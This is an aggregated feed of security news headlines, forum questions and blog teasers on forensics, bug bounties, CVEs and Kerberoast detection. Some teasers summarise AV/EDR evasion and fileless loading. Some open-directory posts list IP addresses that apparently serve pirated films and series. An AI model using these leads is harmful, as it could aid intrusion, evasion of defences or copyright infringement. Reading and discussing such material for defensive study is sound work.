    We have been plagued by this problem over and over & have used various techniques to get around it so I thought I would reach out and ask. How are you getting data from a forensic image (e01 for example) ready for review tools (like Relativity)? I appreciate you all btw! TIA submitted by /u/Original-Face-9933 [link] [comments]
    Remote collection
    I'm 100% sure there is an OSS tool that allows you to create an ISO that you can send to a person, and when they boot it, it starts making a forensic image of the hard drive that is sent via SSH to a server you set up. Anyone know what I'm talking about? submitted by /u/Hispan [link] [comments]
  • Open

    Collection of vulnerable code snippets (updated every friday)
    This GitHub repository contains several different vulnerable code snippets to practice your code analysis. The code snippets are beginner friendly but suitable for all levels! Hope you will like it 🤘 submitted by /u/hisxo [link] [comments]
    Explaining AWS Encryption Access: A Deep Dive on KMS Access and KMS Key Grants
    submitted by /u/jsonpile [link] [comments]
  • Open

    Ibexa DXP patched for GraphQL password hash leak vulnerability
    Article URL: https://portswigger.net/daily-swig/ibexa-dxp-patched-for-graphql-password-hash-leak-vulnerability Comments URL: https://news.ycombinator.com/item?id=33658257 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-11-18 Review
    Akamai can flag 13 million malicious domains per month among newly observed domains by Avenger; Brute Ratel C4 Badger analysis in practice and detection by ourren; Analysis of Ukraine's cyber vulnerability from the perspective of cyberspace mapping by ourren; For more of the latest articles, visit SecWiki
  • Open

    Soundfonts; aimed at video game makers so it seems
    https://soundfonts.kor.ninja/ Soundfonts and sample sets. For those that don't use them - a soundfont is a library of sounds you load into an instrument on your computer. You could download a violin soundfont and play back the violin sounds across a keyboard instrument, for example. submitted by /u/Loscha [link] [comments]
    This browser extension lets you browse web accessible folders like a file explorer
    I recently discovered this open directories thingy and I thought it was very cool. But I didn't like the UI on these pages that much. I thought it'd be cool if I could see thumbnails for at least images and videos before clicking them. I then asked in this subreddit for a solution, but I didn't like any that much. I then decided to build my own browser extension which would let me view the web folder similar to how a file explorer would. This is what I came up with. Please give it a try and let me know what improvements you would like on it. https://i.redd.it/qfooa0bvjp0a1.gif Images are not loaded in their original size/resolution; they are sent to a backend, and the backend compresses the images, which are shown as thumbnails. They are usually around 5-10kb in size, so it saves a lot of data for you. Original images are loaded as a fallback if the backend fails to compress an image. HOW TO USE: Simply open any directory page and click the extension icon which appears to the right of your address bar, OR press ALT+Z as a shortcut. Then the page will switch to file explorer view, which lets you view info (or preview video/image thumbnails) of the directory items. You can toggle the item size or sort the items as well. DOWNLOAD IT HERE: https://microsoftedge.microsoft.com/addons/detail/file-explorer/aofbajadmbkdagnfajjaghakabgifdfp I have only published it to Microsoft Edge addons because it is free; Google has a fee to register as a Chrome extensions developer, which I don't want to pay YET. The only drawback I see for using Edge is that it doesn't support extensions on the file:// protocol, which means this extension won't work if you try to view your local files in the Edge browser. It does work on other Chromium browsers, though. submitted by /u/uzair7866 [link] [comments]
    Previous post, now, new and improved with TITLES
    Found via a previous post. These are all essentially the same, just a couple different ways to access... https://fsa.remotestre.am/Movies/ https://fsa.remotestre.am/Shows/ https://fsa.remotestre.am/ https://45.148.120.91/Movies/ https://45.148.120.91/Shows/ https://45.148.120.91/ however, here's the secret sauce. Find the titles via this site: https://watcha.movie/movie/ the Download Link matches - in most cases I tested - the number in the OD. NSFW cause there's some boobies. submitted by /u/Bonus_Personal [link] [comments]
    Interesting collection of PDF eBooks.
    Mysticism, Nature Cures, Occult. https://avalonlibrary.net/ebooks/ submitted by /u/Shitemoji69 [link] [comments]
    Any workprint collectors on here?
    Hi, new to this forum. Are there any workprint collectors on here? submitted by /u/Fun-Barracuda-6375 [link] [comments]
  • Open

    Hacking with Hydra — A Practical Tutorial
    Hydra is a fast password cracker used to brute-force and gain access to network services like SSH & FTP. Continue reading on Stealth Security »
    Git Exposed — How to Identify and Exploit
    What is Git? Continue reading on stolabs »
  • Open

    CIS 2022 Shenzhen Sub-venue Agenda Preview | Advanced Threat and Vulnerability Management Forum
    On November 23, the CIS 2022 Shenzhen sub-venue will take place as scheduled; we very much look forward to old and new friends attending in person and reliving the warmth of meeting offline.
    Rankings Released | WitAwards 2022 China Cybersecurity Industry Annual Selection Results
    At the Shanghai main venue of the CIS 2022 Cybersecurity Innovation Conference, the WitAwards 2022 China Cybersecurity Industry Annual Selection, which ran for more than two months, reached its final results announcement.
    Cyberspace Administration of China Issues Revised "Provisions on the Administration of Internet Comment Services" for Implementation
    The new Provisions make clear that comment service providers must manage comment service users and public account operators in accordance with their user service agreements.
    State Administration for Market Regulation and Cyberspace Administration of China Release "Implementation Rules for Personal Information Protection Certification"
    The Rules set out the basic principles and requirements for certifying personal information handlers' processing activities, including the collection, storage, use, processing, transmission, provision, disclosure, deletion and cross-border transfer of personal information.
    Comparative Analysis of Three Versions of the "Critical Information Infrastructure Security Protection Requirements"
    Overall, the differences between the 2021 version and the final standard are small, with only a few places modified, whereas the changes compared with the 2019 review draft are considerable.
    FreeBuf Weekly | Android Faces Major Risk, Lock Screen Easily Bypassed; Google Backs Down and Seeks $390 Million Settlement
    A sophisticated phishing kit has been targeting North American users, exploiting holidays such as Labor Day and Halloween to launch attacks on consumers.
    Want a certification? The hands-on kind. CCSS-R training is now open for enrollment!
    National-level certification, guided by the Third Research Institute of the Ministry of Public Security, CCSS evaluation: a winning hand!
    JabberZeus Leader "Tank", Wanted by the FBI for 10 Years, Arrested by Swiss Police
    News on November 17: a Ukrainian national wanted by the United States for ten years was arrested by Swiss authorities in Geneva on October 23; he is a member of the JabberZeus cybercrime gang.
    With the Year-End Shopping Season Approaching, a Sophisticated Phishing Kit Is Targeting North American Consumers
    A sophisticated phishing kit has been targeting North American users, exploiting holidays such as Labor Day and Halloween to launch attacks on consumers.
    Notorious Hive Ransomware Extorts $100 Million from More Than 1,300 Victims
    The FBI said today that since June 2021 the notorious Hive ransomware gang has successfully extorted roughly $100 million from more than a thousand companies.
    How to Improve CI/CD Pipeline Security?
    Accelerating digitalization has quickened product development and iteration; while CI/CD speeds up product releases, it is also susceptible to cybersecurity problems such as code corruption, security misconfigurations and poor secrets management.
  • Open

    Vulnerability Analysis of the WordPress Plugin WOOCS: From LFI to RCE
    Author: 墨云科技 VLab Team. Original link: https://mp.weixin.qq.com/s/2DqN3EsHqG24AjMy8scecA Vulnerability summary: WooCommerce Currency Switcher (WOOCS) is a multi-currency plugin for WooCommerce that lets site visitors switch the currency of product prices in real time according to configured exchange rates and pay in the selected currency. It allows any currency to be added to a WooCommerce store...
  • Open

    Powershell-empire
Hello, I'm completely new to cyber-security and Kali Linux, so I'm using Kali Linux in VMware and I've been watching tutorials on how hackers remotely control a PC using PowerShell Empire. So I wanted to test it on myself using PowerShell Empire by creating a windows/launcher_bat stager. The problem is that when I send the launcher.bat to my other Windows 10 laptop and open it, it doesn't return the agent. But if I send it to the same PC that I'm using (my Windows 10 PC that I'm running Kali Linux on in VMware), it returns the agent. So does anyone know why it doesn't return the agent on my other Windows 10 laptop and how to fix it? submitted by /u/Ah-Hell_nah [link] [comments]
    Dataset I can test IDS/IPS tools against?
I am doing a university project and I need to find a problem (a network security vulnerability), which I then need to test solutions like IDS/IPSs against using datasets. I only know of the DARPA 1998 dataset; are there any other datasets? Also, any recommendations on which tools to use? Many thanks. submitted by /u/Much_Wonder2000 [link] [comments]
    Pihole receiving thousands of dns requests to higi.com
    Hello, I am fairly new to home networking and network security. I recently set up a pihole mainly to have fun and tinker around. Over the past 2 days, I have observed thousands of queries to higi.com. The requests are coming from my router, which is to be expected as all my other devices pass through the router before hitting the pi. Does anyone have steps I should take to figure out which device is sending the requests, or other things I can do to remedy the situation? I have already blocked the domain both at my router and at the pi. submitted by /u/dinkx3 [link] [comments]
    SQL injection with only letters and numbers, is it possible?
Let's say that a server sanitizes SQL queries by only allowing letters and numbers; is SQL injection still possible this way? I've read some people say that it's still possible but none of them gave any example. submitted by /u/Chillseashells [link] [comments]
    Is there an actual public “blacklist” of known malicious domains?
    I’m working on a browser plug-in that will search a user’s inbox for potential phishing emails. I would love to be able to run a sender domain against a .csv file of known malicious domains as part of this check. Does anyone know if such a list exists publicly? Thanks! submitted by /u/kipduck [link] [comments]
    My dad's visa got stolen
    Hello, My dad was purchasing something from a Facebook page, and he entered his visa details on their website. I know it's his mistake and it's an idiotic phishing scam, but my dad, like many seniors, isn't up to date on technology. What can he do now? I told him to send me a screenshot of the bank's name and the Facebook page or their website. But it's a 99% scam. He was purchasing something; it deducted the amount. Then it deducted another huge amount without his consent. I feel that any security knowledge I have is useless and that I can't help. I feel the only way, or the only one who can do anything, is the bank. submitted by /u/Ramseesthe4th [link] [comments]
    Serverless Architecture / Spyware
    Is it possible to use/manipulate serverless architecture in such a way that it could effectively emulate spyware when the target device is running VPN? For example: Eventbridge (Zerista Ver. 332.4 Build 2022.18.04.10) submitted by /u/ZTS001 [link] [comments]
    How do I go back into penetration testing successfully?
    Hey there :) I'm currently working in web development (approaching 6 months in my current position) but I keep having moments of really wanting to return to penetration testing. I've been in IT a few years now and hacking is what initially drove me to the industry (I even got OSCP certified and passed the first time.) Along with that I did discover an enjoyment for programming too and I am a capable programmer, but I'm still drawn towards hacking. I've never quite got the same satisfaction out of anything that I get when I discover a vulnerability in something and whenever I think of projects in my personal time, my mind jumps towards rooting HTB machines or developing tools to automate penetration testing (I've had a particular idea of 'HackerHarold', a desktop application that automates the enumeration process and handles tests on the OS itself.) I would also love to start playing around with malware development again. However, I had no luck whatsoever in finding a job as a Penetration Tester prior to working in Web Development. I never even got through to the interview stage despite having a Tumblr blog full of work I've done and being OSCP-certified. I guess what I'm looking for is advice on how to get back into the industry and how to secure a job as a Penetration tester? I do also have web dev experience now too which I can imagine will be beneficial, but I'm not even sure if 6 months of that is enough. My blog is here: https://c-cracks.tumblr.com/ I haven't done much of anything recently due to university and work but I dropped one of my uni modules for the year (was taking up all of my time) so I am in a position to dedicate a day a week to my goal. submitted by /u/mehFFS123 [link] [comments]
  • Open

    [PDF, research paper] Do Users Write More Insecure Code with AI Assistants?
    submitted by /u/ScottContini [link] [comments]
    New Tool: Orpheus - Bypasses most Kerberoast Detections
    submitted by /u/ben0xa [link] [comments]
    Packet Tuesday: New video series about in depth network traffic analysis
    submitted by /u/dentalfoss [link] [comments]
    Infosys leaked FullAdminAccess AWS keys on PyPi for over a year
    submitted by /u/Most-Loss5834 [link] [comments]
  • Open

    Awesome Bug-Bounty
    A curated list of awesome bug-bounty tools and resources. Continue reading on Medium »
    Reflected XSS using Double Encoding
    Bypassing XSS filters using Double Encoding Continue reading on Medium »
    How to Get Into Bug Bounties?( Beginner’s guide)
    Hello Future Bug Bounty Hunters! Continue reading on Medium »
    Daily Web App Security | 28 of 100 | Bug bounty basics
    In today’s article, we introduce you to the world of bug bounties Continue reading on Medium »
    Information Exposure — My Fourth Finding on Hackerone!
    Information Exposure Through Directory Listing — The bug title says everything about it. Find a path or URL on any website that's enable… Continue reading on Medium »
  • Open

    Browser Login Data Dates Earlier than Laptop Date
    I used Axiom to parse browser data on a laptop installed in 2022. Axiom found logins within Chrome's Login Data file and Firefox's logins.json, many of which were "created" as early as 2011. Is this an indication that the browser profiles were created on another computer and copied over to the 2021 laptop? Could there be another explanation for the large date gap? submitted by /u/Lazy_perv [link] [comments]
    FTKimager unable to run and is a gear icon.
    submitted by /u/AlienDumpling [link] [comments]
  • Open

    Backgrounds...
    Well if you still like revolving Backgrounds on your desktop here is a few Link... prob a re-post, but I lost lots of images so went looking again... submitted by /u/xanderTgreat [link] [comments]
    Tons of assorted (mostly old ham) radio books. (Plus a lot of other interesting things: history of video tape recording...) [45G]
    submitted by /u/NullVoidPointer [link] [comments]
  • Open

    The Spy Who Vanished — Hacktoria Contract Walkthrough (Understanding OSINT)
    In this article we are going to solve a hacktoria contract called “The spy who vanished”. Continue reading on Medium »
    Gmail OSINT —  Extracting information from a Gmail address
    In this article we are going to talk about, the information that you can extract from a Gmail (Google email) address (because most people… Continue reading on System Weakness »
    Gmail OSINT —  Extracting information from a Gmail address
    In this article we are going to talk about, the information that you can extract from a Gmail (Google email) address (because most people… Continue reading on Medium »
    SEINT: Polish OSINT expert and trainer
    Discussing Misinformation, Social Engineering and OPSEC Continue reading on Medium »
    KPMG2022 : BluehoaxBullhoax(OSINT)
Hello everyone. This is about the topic KPMG2022 : BluehoaxBullhoax(OSINT), which is a challenge from the "KPMG Cyber Security Challenge 2022" competition… Continue reading on Medium »
    OSINT in Metaverse
    OSINT stands for Open Source Intelligence which is gathering information or doing reconnaissance through the sources which are present in… Continue reading on Medium »
    Beginner
    I have a new hobby: OSINT. Or I think I do, if I can get over my paranoia about the hacker community. I assume any n00b who shows up with… Continue reading on Medium »
  • Open

    Vulnerability Management at Lyft: Enforcing the Cascade [Part 1]
    Article URL: https://eng.lyft.com/vulnerability-management-at-lyft-enforcing-the-cascade-part-1-234d1561b994 Comments URL: https://news.ycombinator.com/item?id=33642995 Points: 2 # Comments: 0
  • Open

    Meta’s new kill chain model tackles online threats
    submitted by /u/FOSS_Lover [link] [comments]
  • Open

    API tokens and Emails leaked lead to sensitive information Disclosure
    ZeroBounce disclosed a bug submitted by devdevirl: https://hackerone.com/reports/1776711
    CSRF in AppSearch allows creation of "curations"
    Elastic disclosed a bug submitted by dee-see: https://hackerone.com/reports/1477050 - Bounty: $833
  • Open

    SecWiki News 2022-11-17 Review
SecXOps Security Intelligent Analysis Technology White Paper by ourren; Battlefield Intelligent Command System DELTA In-Depth Analysis Report by ourren; Refitting JNDI Injection Tools by SecIN Community; Defect Variable Localization Technique Based on Statistical and Mutation Analysis by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Frida & Objection without Jailbreak!
    No content preview
    Only 1 Month Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    The Art of Bypassing Kerberoast Detections with Orpheus
    Back in May of 2018, I wrote a blog post detailing the steps I took to detect Kerberoast (T1558.003) attacks. This research allowed us to help organizations build a detection for when a threat actor requests the Kerberos ticket for accounts with a service principal name established. In this blog post, I am going to... The post The Art of Bypassing Kerberoast Detections with Orpheus appeared first on TrustedSec.
  • Open

    FreeBuf Morning Report | A Polish Citizen Detained by Russia's FSB; US Says Iranian Hackers Breached a Federal Agency
    According to the RT website, the Russian Federal Security Service said in a statement released on the 16th that a Polish citizen holding a diplomatic passport was detained on suspicion of taking part in a smuggling scheme in Moscow.
    Check Whether You're Affected! Hundreds of Amazon RDS Instances Leaked User Information
    Hundreds of databases on Amazon Relational Database Service (Amazon RDS) are exposing users' personally identifiable information (PII).
    Twitter Source Code Suggests End-to-End Encrypted DMs Are Coming
    Musk replied to the tweet revealing the feature with a "wink" emoji, hinting that the feature is indeed under development.
    Google Will Introduce Privacy Sandbox in Android 13 in 2023
    Privacy Sandbox aims to create technology that protects people's online privacy and limits covert tracking.
    At CIS 2022 in Shanghai This November, I Saw Signs of a Recovery for Cybersecurity Industry Conferences
    On November 16, the CIS 2022 Cybersecurity Innovation Conference was successfully held at the Shanghai Marriott Hotel Parkview.
    China, the US and Russia Take Part in a Cybersecurity Exercise for the First Time; Face-to-Face Confrontation Next Year
    The conference program includes a multinational cybersecurity exercise, which will be the first time China, the US and Russia have jointly taken part in such an exercise.
  • Open

    404 StarLink Project | 4 New Open-Source Security Projects Added, Click to View
    About the StarLink Project: the "404 StarLink Project" is an open-source project collection initiative launched by Knownsec 404 Lab in August 2020. Its original aim was to release some of 404 Lab's internal tools as open source so they could deliver more value, which became "404 StarLink Project 1.0", including well-known tools such as Pocsuite3 and ksubdomain; we soon received a great deal of positive feedback. In November 2020 we turned our attention to the whole security community, taking StarLink members as the core and selecting high-quality, meaningful, interesting and persistent...
    Analysis and Verification of the Linux Kernel cls_route Filter UAF Vulnerability (CVE-2022-2588)
    Author: Venustech ADLab. Original link: https://mp.weixin.qq.com/s/Qs_-CTZyojRe_x8E0KiXMg 1. Preface: Several months ago, researchers at the foreign security organization ZDI disclosed a Linux kernel local privilege escalation vulnerability in the cls_route filter of the traffic control subsystem's packet classifier: when the old filter handle is 0, the kernel does not remove it from the hash table before freeing it. The vulnerability is numbered CVE-2022-2588, and moreover...
    A Discussion of Android Component Logic Vulnerabilities
    Author: evilpan. Original link: https://mp.weixin.qq.com/s/shbmbR0AizKHJSAJsLSbfA This article is a contributed submission; Seebug Paper welcomes your submissions, and every accepted one receives a gift! Submission email: paper@seebug.org Preface: As society places ever more emphasis on security, all sorts of defensive programming and vulnerability mitigation measures have gradually been added to operating systems, such as code signing, pointer signing, address randomization, isolated heaps and so on, and many...
    [HEVD Exploit] Learning to Exploit the Windows Kernel Vulnerability StackOverflowGS
    Author: zoemurmure. Original link: https://mp.weixin.qq.com/s/d8Mac01ncK6_Xtf1piNE8Q This article is a contributed submission; Seebug Paper welcomes your submissions, and every accepted one receives a gift! Submission email: paper@seebug.org 0. Preface: HackSys Extreme Vulnerable Driver (HEVD) was developed for learning kernel exploitation techniques...
  • Open

    Parsing atop files with python dissect.cstruct
    submitted by /u/DiabloHorn [link] [comments]
    Root RCE via CSRF (and other vulns) in F5 Big-IP devices [my original research]
    submitted by /u/iagox86 [link] [comments]
    HZ RAT goes China
    submitted by /u/OwnPreparation3424 [link] [comments]
    "Fangxiao: a Chinese Threat Actor" - by Cyjax researchers @nyxilar and @_nynan
    submitted by /u/_nynan [link] [comments]
    Is your VMware vSphere environment secure?
    submitted by /u/karimhabush [link] [comments]
  • Open

    Is SIEM dying off?
I got hired at my current company because of my knowledge of SIEM appliances. To be honest tho, I spend more of my time and get more value out of dealing with our Proofpoint email security platform, CASB, and our EDR appliance than I do our SIEM. I don't work for a company that is heavily audited. I'm not in the banking or medical industries so it's not a huge issue whether we have a 6-month backlog of logs or not. We're at the end of our fiscal year and starting to consider whether we should ditch our SIEM and spend that money on a more impressive EDR solution, or something like it. What do you all think? Should we look at something newer and fancier, like an XDR solution? Is SIEM actually dying? submitted by /u/0wlBear916 [link] [comments]
    NetSec jobs?
Hi; can you please give me some information about the "network security engineer" job market? 1. Do you need to know how to configure major changes to VPNs, MPLS, BGP, etc. on the spot, without referring to documentation? 2. Is solid WAN knowledge required? 3. Approximately what % of the work would be on routers/switches? 4. Does it pay better than network engineer positions (+ AWS, automation)? 5. At what level is SD-WAN required in Network Engineer jobs? submitted by /u/Odd-Jump-3066 [link] [comments]
    Is it legal for vendors to scan my environment without my consent?
A client reports to us that one of our machines has a vulnerability reported by a vendor. It seems weird to me that someone would scan our environment randomly without our consent and look for vulnerabilities. Is it common, or is this industry practice? submitted by /u/alphasystem [link] [comments]
    Suggestions for SAST/DAST/SCA tool for DevOps/GitHub bonus if it has process/documentation functionality
    We have a number of different applications that are being developed internally and are looking for a SAST/DAST/SCA tool that can cover everything. There is a mix of technologies/languages in play. Visual Studio and Eclipse on the IDE side of things, Azure DevOps and GitHub for source control, languages are mostly JS, C#, ASP.NET, PHP with random other little things throughout. Also trying to find something that will help with threat modeling and managing the process/procedures/documentation around SDLC, bonus if this tool is included in the SAST. I spoke with Veracode, Checkmarx and Synopsys but this is out of my wheelhouse on what I am good at. Any suggestions on what to look at? submitted by /u/internetquestions21 [link] [comments]
  • Open

    I published a new tool for finding AV signatures in PowerShell scripts that can help guide obfuscation efforts.
    submitted by /u/pracsec [link] [comments]
    Become R00t — Linux Kernel Exploits
    submitted by /u/Clement_Tino [link] [comments]
  • Open

    Twitter Two-Factor Authentication Has a Vulnerability
    Article URL: https://www.bankinfosecurity.com/twitter-second-factor-authentication-has-vulnerability-a-20475 Comments URL: https://news.ycombinator.com/item?id=33631284 Points: 2 # Comments: 0
    Cyber vulnerability in networks used by spacecraft, aircraft and energy systems
    Article URL: https://news.umich.edu/cyber-vulnerability-in-networks-used-by-spacecraft-aircraft-and-energy-generation-systems/ Comments URL: https://news.ycombinator.com/item?id=33617377 Points: 1 # Comments: 0
  • Open

    [Git Gud] GitHub.com Svnbridge memcached deserialization vulnerability chain leading to Remote Code Execution
    GitHub disclosed a bug submitted by ajxchapman: https://hackerone.com/reports/1593913 - Bounty: $17500
    Ability to bypass locked Cloudflare WARP on wifi networks.
    Cloudflare Public Bug Bounty disclosed a bug submitted by joshatmotion: https://hackerone.com/reports/1635748 - Bounty: $1000
    RCE via github import
    GitLab disclosed a bug submitted by yvvdwf: https://hackerone.com/reports/1672388 - Bounty: $33510
    CSP-bypass XSS in project settings page
    GitLab disclosed a bug submitted by yvvdwf: https://hackerone.com/reports/1588732 - Bounty: $10270
    XSS: `v-safe-html` is not safe enough
    GitLab disclosed a bug submitted by yvvdwf: https://hackerone.com/reports/1579645 - Bounty: $6580
New /add_contacts /remove_contacts quick commands susceptible to XSS from Customer Contact firstname/lastname fields
    GitLab disclosed a bug submitted by cryptopone: https://hackerone.com/reports/1578400 - Bounty: $13950
  • Open

    Announcing the Evmos Bug Bounty Program Supported By ImmuneFi
    We’d like to formally announce the launch of our new Evmos Bug Bounty Program in collaboration with ImmuneFi! Continue reading on Evmos Announcements »
    Frida & Objection without Jailbreak!
    So are you the one who stops security testing if Jailbreak Detection is not bypassed?? No worries, we have got you covered! A method to… Continue reading on InfoSec Write-ups »
    Bug Writeup: Information System Belonging to Dispendukcapil Kota Pasuruan
    Alhamdulillah, today my report about a bug in the web application belonging to Dispendukcapil Kota Pasuruan has been fully fixed. Continue reading on Medium »
    The Story Of A Strange / Stored IDOR.
    Story : Continue reading on Medium »
    Immunefi Launches Timebound Bug Bounty For Proof-of-Capital Vault System
    Starting today for the next three weeks, Immunefi is launching a Timebound Bug Bounty Program for its new, proof-of-capital Vault System. Continue reading on Immunefi »
    HOW TO CRAWL LINKS LIKE A PRO!
    Hi everyone! I hope you all are doing good. In this article, we are going to learn how we can crawl more links of a domain to increase our… Continue reading on Medium »
    Account Takeover worth of $2500
    whoami? Continue reading on Medium »
    DLL Hijacking Persistence Using Discord
    How old hacking techniques like DLL Hijacking still work in the present day and how you can find them yourself. Continue reading on InfoSec Write-ups »
  • Open

    Replacement for Helix Retriever
    I don't do forensic work often, just frequently enough to maintain my GCFA certification and keep my skills kinda in the right decade. That said, I'm looking for the equivalent of a tool I often used in the late '00s. Drew Fahey's "Retriever" was on the Helix forensics distribution. I found it to be very helpful in some of my corporate internet misuse investigations. Simply put, you point it at a mounted image, and it would retrieve all images and videos from any path you point to on that image, displaying them as thumbnails. Drew described it as a utility for "knock and talks" or "quick peeks", but I found it useful in the thankfully rare situation where we are investigating a user's PC that may or may not have downloaded NSFW material. Although I still have my old 2007 Helix CDs sitting around, and they'd likely still work if I can find a PC with a CD drive (and maneuver my way around UEFI restrictions), I'm guessing there's a newer, better alternative out there. What do you use? submitted by /u/RulesLawyer42 [link] [comments]
  • Open

    CVE-2022-32932: ZinComputeProgramUpdateMutables() OOB write due to double fetch
    Article URL: https://0x36.github.io/CVE-2022-32932/ Comments URL: https://news.ycombinator.com/item?id=33627702 Points: 1 # Comments: 0
  • Open

    Exiftool — tool to get meta information from image, audio and video files.
    Exiftool is a tool used in forensic analysis and penetration testing to gather information over file metadata data. Continue reading on System Weakness »
    Exiftool — tool to get meta information from image, audio and video files.
    Exiftool is a tool used in forensic analysis and penetration testing to gather information over file metadata data. Continue reading on Medium »
    OSINT AND THE METAVERSE.
    WHAT IS METAVERSE? Continue reading on Medium »
  • Open

    High res scans of old movie posters and some other miscellaneous scans.
    submitted by /u/lefunnyusernamexd [link] [comments]
    how do i scan all links on windows?
Chrome/Firefox extensions welcomed, or free downloadable applications. Any help is appreciated, thanks. submitted by /u/Shad27753 [link] [comments]
    How to make sure I'm not downloading any viruses from opendirectories?
I recently found this method to download stuff just by typing "index of...", can someone tell me whether there is any malware risk when downloading movies/tv series? I want to download Arrow Season 01 (This link: http://167.114.174.132:9092/series/arrow/1/1/ ) How do I find out whether the files in it are safe? Usually when I download videos they are always .mp4 format. But these files are .mkv format, google says .mkv can sometimes potentially be viruses. How to know whether the files in the link are safe? I always scan the files with an AV after downloading them and make sure that there aren't any executables. Can .mkv files be harmful? Is it possible for a virus to be disguised as a .mkv? submitted by /u/COGex123 [link] [comments]
  • Open

    SecWiki News 2022-11-16 Review
How to Become an Excellent Engineer: Soft Skills by ourren; Overview of the Cyberspace Mapping Theoretical Framework by ourren; Domain Penetration Mind Map by 君行路. For more of the latest articles, visit SecWiki.
  • Open

    Network Security Trends: May-July 2022
    Unit 42 provides summaries and analysis of the vulnerabilities published between May-July 2022, including the severity and attack origin distribution. The post Network Security Trends: May-July 2022 appeared first on Unit 42.
  • Open

    autoSSRF: A Context-Aware Smart SSRF Vulnerability Scanner
    autoSSRF identifies vulnerabilities based on context and is suited to large-scale scanning tasks.
    How to Use UnBlob to Extract Files from Containers of Any Format
    UnBlob can parse more than 30 known formats of documents, archives and file systems, and can recursively extract file contents from them.
    FreeBuf Morning Report | EU Strengthens Cyber Defense in Response to the Russia-Ukraine Cyber War; NSA Urges Use of Memory-Safe Programming Languages
    Strengthening Europe's secure network capabilities, promoting civil-military cooperation, closing potential security gaps, reducing strategic dependencies and developing cyber skills.
    Cloud Security Series 1: An In-Depth Look at the Cloud Security Shared Responsibility Model
    The cloud, as a world-changing technology trend, is being adopted by organizations of every kind, and cloud-based digital transformation is accelerating. An important issue that has developed rapidly alongside cloud computing is security. In cloud security, the first concept users need to understand clearly is the shared responsibility model; today we
    Three Weeks into Musk's Takeover of Twitter, Two-Factor Authentication Has a Vulnerability
    The vulnerability appeared during the third week of Elon Musk's control of Twitter, as the company's key security and compliance staff departed and large numbers of employees and contractors were laid off.
  • Open

    Hidden parameters discovery suite
    Hidden parameters discovery suite written in Rust. Continue reading on Medium »
    Cracking Passwords using John The Ripper
    John the Ripper is a password-cracking tool that can crack hundreds of hashes, ciphers, and even password-protected files. Continue reading on Stealth Security »
    “The Social Network” teaching you Cyber Offence
    First thing: Watch this a few times, or one if you’re attentive Continue reading on Medium »
  • Open

    DLL Hijacking Persistence Using Discord
    No content preview
    Fine-Tune Security Alerts & Optimisation
    Blue Team SOC Activity Continue reading on InfoSec Write-ups »
  • Open

    Let's talk about Nuclei YAML syntax templates and Pocsuite3 compatibility ideas
    Author: fenix@Knownsec 404 Team Chinese version: https://paper.seebug.org/2015/ Introduction Pocsuite3 is an open source remote vulnerability testing framework built by Knownsec 404 Team based on t...
    Notes on Developing eBPF Programs on Android (Part 2)
    Author: Hcamael@Knownsec 404 Lab. Date: November 16, 2022. Related reading: Notes on Developing eBPF Programs on Android (Part 1). Going deeper on the basis of the previous chapter: in the previous article I modified a version of the BPF program code, bpftest.c, and the code was also published there, but a complete BPF program also needs a user-space loader, that is, a program that reads the BPF program and hands us its data. As mentioned before, one can use...
  • Open

    Getting Binaries into Memory (Going Fileless)
    In this video, I show how to convert C# executables into PowerShell scripts and then use download cradles to put them directly into memory. This leaves no trace of the executable on disk and can slip by AV/EDR in many cases. Getting Binaries into Memory (Going Fileless) submitted by /u/Infosecsamurai [link] [comments]
  • Open

    Any explanation for why I would be seeing remote PS commands "$global:?" & "prompt" repeatedly in Windows logs? Seems benign, but odd.
    For a DFIR / threat hunting exercise, I looked up remote PS logs (windows event ID 4104) and it's always hard with these labs to know whether I'm looking at cyber range-isms or malicious activity. But ignoring the domain admin being added in this screenshot (although that seems like something to look into, lol), in-between commands I'm seeing this odd $global:? command, which when tested on my local PC just returns True. (logs ordered latest -> earliest in these screenshots) https://i.gyazo.com/4e550867aad3311ddd83f700a4fd40fb.png Any explanation on that? Even if not malicious, I'd just like to understand what I'm looking at and don't have access to a SME on this exercise to ask about it. Then earlier in the logs, I start seeing a different odd command in the same sort of "every-other-command" pattern (but sometimes multiple times in a row): https://i.gyazo.com/a57c8d6db531ec18d89beef40a29248b.png And prompt is not a very complicated command; I looked it up. The default PowerShell prompt displays the current working directory. To display the prompt definition: (Get-Command prompt).definition This seems odd too, but perhaps it's the consequence of something normal / uninteresting. submitted by /u/Jonathan-Todd [link] [comments]
    Any antivirus recommendations for Android?
    I recently ran a Malwarebytes scan with no detections but I'm still paranoid. Any recommendations for an antivirus with options to scan? submitted by /u/Foreign-Magician-767 [link] [comments]
    laptop for sans/linux
    Quick question, I had mentioned earlier that I was venturing into cyber security and had a pretty good response. One other item I was curious about is that I was going to purchase a new laptop but want to do so on a budget, around 500$. I had looked at https://www.newegg.com/hp-elitebook-840-g3/p/N82E16834271969 for use with SANS as well as dabbling in Linux, any recommendations for a budget friendly laptop would be greatly appreciated. submitted by /u/nofancyname12 [link] [comments]
    do ssh keys expire?
    Say I create a private/public key pair with putty. Do these keys ever expire? submitted by /u/87390989 [link] [comments]

    Domain Escalation with Token Impersonation
    Token Impersonation with Delegation Tokens — MITRE ATT&CK — Access Token Manipulation T1134 Continue reading on R3d Buck3T »
    Simple Bloodhound Tutorial
    What is BloodHound Continue reading on System Weakness »

    AUC - Hotaru Games Writeups
    Hello, it’s Ahmed Mahmoud (xElessaway). First, it was my pleasure to create the steganography challenges in this CTF. Second, the challenges were… Continue reading on Medium »
    Road to Nowhere — Hacktoria Contract Walkthrough (Understanding OSINT)
    Today we are solving an amazing contract called ‘Road to Nowhere’, which is available on Hacktoria. Continue reading on Medium »
    A Strange File Writeup
    It takes an insane level of effort for an insane challenge — VEEXH Continue reading on The Sleuth Sheet »

    Where is Brian?
    http://103.74.121.78/ submitted by /u/SubliminalPoet
    Just this...
    Shows, but is it an O/D... http://78.203.154.250 my clean skin is in the post yay... submitted by /u/xanderTgreat
    Movies/Series in English (ENG)
    https://74.115.139.239:9090/ http://130.204.8.243:8000/ https://198.211.10.158/ http://62.210.122.240:8090/ http://51.81.217.201:8081/ http://54.37.91.120:49156/ https://45.148.120.91/ http://73.66.228.201:9800/ http://196.216.49.238/ submitted by /u/SubliminalPoet
    Movies, series, anime, books, software, ROMS, music, games
    See the comments for probably shadowbanned URLs. This is a repost because the first one got shadowbanned.
    - http://5.135.178.104:10987/ => Movies, series, audiobooks, software
